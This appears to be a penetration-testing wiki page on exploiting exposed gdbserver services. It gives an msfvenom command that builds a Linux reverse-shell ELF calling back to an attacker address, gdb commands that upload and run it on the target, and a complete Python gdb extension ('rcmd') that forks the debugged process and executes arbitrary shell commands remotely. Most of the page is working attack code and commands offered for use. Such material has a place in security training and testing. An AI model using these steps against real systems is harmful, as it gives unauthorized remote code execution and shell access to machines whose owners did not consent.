Basic Information
gdbserver is a tool that enables the debugging of programs remotely. It runs alongside the program that needs debugging on the same system, known as the "target." This setup allows the GNU Debugger to connect from a different machine, the "host," where the source code and a binary copy of the debugged program are stored. The connection between gdbserver and the debugger can be made over TCP or a serial line, allowing for versatile debugging setups.
You can make gdbserver listen on any port, and at the moment nmap is not capable of recognising the service.
Exploitation
Upload and Execute
You can easily create an ELF backdoor with msfvenom, upload it and execute it:
# Trick shared by @B1n4rySh4d0w
# Local side: build the payload, then start gdb with it as the local binary.
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4444 PrependFork=true -f elf -o binary.elf
chmod +x binary.elf
gdb binary.elf

# Everything from here on is typed at the gdb prompt.
# Set remote debugger target
target extended-remote 10.10.10.11:1337

# Upload elf file (written to the target's filesystem; it is not cleaned up here)
remote put binary.elf binary.elf

# Set remote executable file
set remote exec-file /home/user/binary.elf

# Execute reverse shell executable
run

# You should get your reverse-shell
# Given remote terminal running `gdbserver :2345 ./remote_executable`, we connect to that server.
# All of the following lines are gdb commands.
target extended-remote 192.168.1.4:2345

# Load our custom gdb command `rcmd` (defined in remote-cmd.py, see below).
source ./remote-cmd.py

# Change to a trusted binary and run it so that it gets loaded on the remote side.
set remote exec-file /bin/bash
r

# Run until a point where libc has been loaded on the remote process, e.g. start of main().
# `rcmd` resolves libc symbols (fork, execl, open, ...) so it needs libc mapped first.
tb main
r

# Run the remote command, e.g. `ls`.
rcmd ls
First of all, create this script locally:
remote-cmd.py
#!/usr/bin/env python3
"""GDB extension that defines the `rcmd` user command.

Loaded with `source remote-cmd.py` inside a gdb session attached to a
gdbserver target. The Python below runs inside the gdb process; every
`gdb.execute("call ...")` / `set $x = ...()` line evaluates a function in
the debugged (remote) process.
"""
import gdb
import re
import traceback
import uuid


class RemoteCmd(gdb.Command):
    """`rcmd <command>`: run a shell command in the debuggee and print its output.

    The debuggee is forked; the child calls execl("/bin/sh", "sh", "-c", ...)
    with stdout and stderr redirected to a file under /tmp on the target, and
    output() reads that file back through the parent process.
    """

    def __init__(self) -> None:
        # Cache: symbol name -> address string, filled lazily by load().
        self.addresses: dict[str, str] = {}
        # Output file on the *target*. The name is random, but nothing in this
        # script ever deletes it, so one file per session is left behind in /tmp.
        self.tmp_file = f'/tmp/{uuid.uuid4().hex}'
        gdb.write(f"Using tmp output file: {self.tmp_file}.\n")
        # Keep both processes of a fork under gdb's control and stay on the parent,
        # so the child can be selected by pid in invoke().
        gdb.execute("set detach-on-fork off")
        gdb.execute("set follow-fork-mode parent")
        # Remove gdb's output truncation so the whole captured output is printed.
        gdb.execute("set max-value-size unlimited")
        gdb.execute("set pagination off")
        gdb.execute("set print elements 0")
        gdb.execute("set print repeats 0")
        # Registers the command under the name "rcmd".
        super(RemoteCmd, self).__init__("rcmd", gdb.COMMAND_USER)

    def preload(self) -> None:
        """Resolve every symbol used later, so a missing one fails before fork() is called."""
        for symbol in [
            "close",
            "execl",
            "fork",
            "free",
            "lseek",
            "malloc",
            "open",
            "read",
        ]:
            self.load(symbol)

    def load(self, symbol: str) -> str:
        """Return the address of `symbol` as printed by `info address`, cached per symbol.

        Raises:
            RuntimeError: if gdb's answer does not match 'Symbol "<name>" is at <addr> ...'.
        """
        if symbol not in self.addresses:
            address_string = gdb.execute(f"info address {symbol}", to_string=True)
            match = re.match(
                f'Symbol "{symbol}" is at ([0-9a-fx]+) .*', address_string, re.IGNORECASE
            )
            if match and len(match.groups()) > 0:
                self.addresses[symbol] = match.groups()[0]
            else:
                raise RuntimeError(f'Could not retrieve address for symbol "{symbol}".')
        return self.addresses[symbol]

    def output(self) -> None:
        """Read self.tmp_file from inside the debuggee and print its contents.

        Uses open/lseek/malloc/read/close/free of the debuggee via gdb
        convenience variables ($fd, $len, $mem).
        """
        # From `fcntl-linux.h`
        O_RDONLY = 0
        gdb.execute(
            f'set $fd = (int){self.load("open")}("{self.tmp_file}", {O_RDONLY})'
        )

        # From `stdio.h`
        SEEK_SET = 0
        SEEK_END = 2
        # File size = offset after seeking to the end; then rewind for read().
        gdb.execute(f'set $len = (int){self.load("lseek")}($fd, 0, {SEEK_END})')
        gdb.execute(f'call (int){self.load("lseek")}($fd, 0, {SEEK_SET})')

        if int(gdb.convenience_variable("len")) <= 0:
            # NOTE(review): $fd is still open in the debuggee on this path; only the
            # success path below calls close().
            gdb.write("No output was captured.")
            return

        gdb.execute(f'set $mem = (void*){self.load("malloc")}($len)')
        # The buffer is not NUL-terminated by read(); printf "%s" relies on the
        # malloc'd memory beyond $len happening to contain a zero byte.
        gdb.execute(f'call (int){self.load("read")}($fd, $mem, $len)')
        gdb.execute('printf "%s\\n", (char*) $mem')

        gdb.execute(f'call (int){self.load("close")}($fd)')
        gdb.execute(f'call (int){self.load("free")}($mem)')

    def invoke(self, arg: str, from_tty: bool) -> None:
        """Entry point of `rcmd`: fork the debuggee, exec `arg` in the child, print the output.

        Args:
            arg: the rest of the command line after `rcmd`, passed verbatim to `sh -c`.
            from_tty: supplied by gdb; unused here.

        Raises:
            Re-raises any exception after writing its traceback to gdb's output.
        """
        try:
            self.preload()

            # Saved so it can be restored in the outer `finally`.
            # NOTE(review): if preload() raises, this name is never bound and the
            # `finally` below raises UnboundLocalError, replacing the original error
            # (its traceback has already been written by then).
            is_auto_solib_add = gdb.parameter("auto-solib-add")
            gdb.execute("set auto-solib-add off")

            parent_inferior = gdb.selected_inferior()
            gdb.execute(f'set $child_pid = (int){self.load("fork")}()')
            child_pid = gdb.convenience_variable("child_pid")
            # Relies on `detach-on-fork off` from __init__: the child must still be an
            # inferior. Indexing [0] raises IndexError if no inferior has that pid.
            child_inferior = list(
                filter(lambda x: x.pid == child_pid, gdb.inferiors())
            )[0]
            gdb.execute(f"inferior {child_inferior.num}")

            try:
                # `arg` is interpolated unescaped into a C string literal of the
                # gdb expression, so a double quote in `arg` breaks the expression.
                gdb.execute(
                    f'call (int){self.load("execl")}("/bin/sh", "sh", "-c", "exec {arg} >{self.tmp_file} 2>&1", (char*)0)'
                )
            except gdb.error as e:
                # A successful execl replaces the child's image, which gdb reports as the
                # called function "exiting"; that is the expected outcome, not an error.
                if (
                    "The program being debugged exited while in a function called from GDB"
                    in str(e)
                ):
                    pass
                else:
                    raise e
            finally:
                # Switch back to the parent and drop the child inferior before reading
                # the output file through the parent.
                gdb.execute(f"inferior {parent_inferior.num}")
                gdb.execute(f"remove-inferiors {child_inferior.num}")
                self.output()
        except Exception as e:
            gdb.write("".join(traceback.TracebackException.from_exception(e).format()))
            raise e
        finally:
            gdb.execute(f'set auto-solib-add {"on" if is_auto_solib_add else "off"}')


# Instantiating the class is what registers `rcmd` (see __init__).
RemoteCmd()